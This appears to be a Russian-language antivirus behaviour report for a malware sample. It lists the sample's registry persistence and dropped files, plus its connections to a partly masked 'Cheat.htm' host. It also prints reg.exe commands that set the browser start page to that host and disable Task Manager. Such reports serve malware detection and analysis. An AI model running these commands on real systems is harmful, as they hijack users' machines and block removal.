Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'IE' = 'iexplore.exe'
- Диспетчера задач (Taskmgr)
- <SYSTEM32>\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v IE /t REG_SZ /d iexplore.exe
- <SYSTEM32>\reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://sk##d.do.am/Cheat.htm" /f
- <SYSTEM32>\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d "1" /f
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\Cheat[2].htm
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\Cheat[3].htm
- <Текущая директория>\2760GD4A.bat
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\Cheat[1].htm
- <Текущая директория>\2760GD4A.bat
- <Текущая директория>\2760GD4A.bat
- 'localhost':1039
- 'sk##d.do.am':80
- 'localhost':1037
- 'localhost':1038
- sk##d.do.am/Cheat.htm
- DNS ASK sk##d.do.am
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''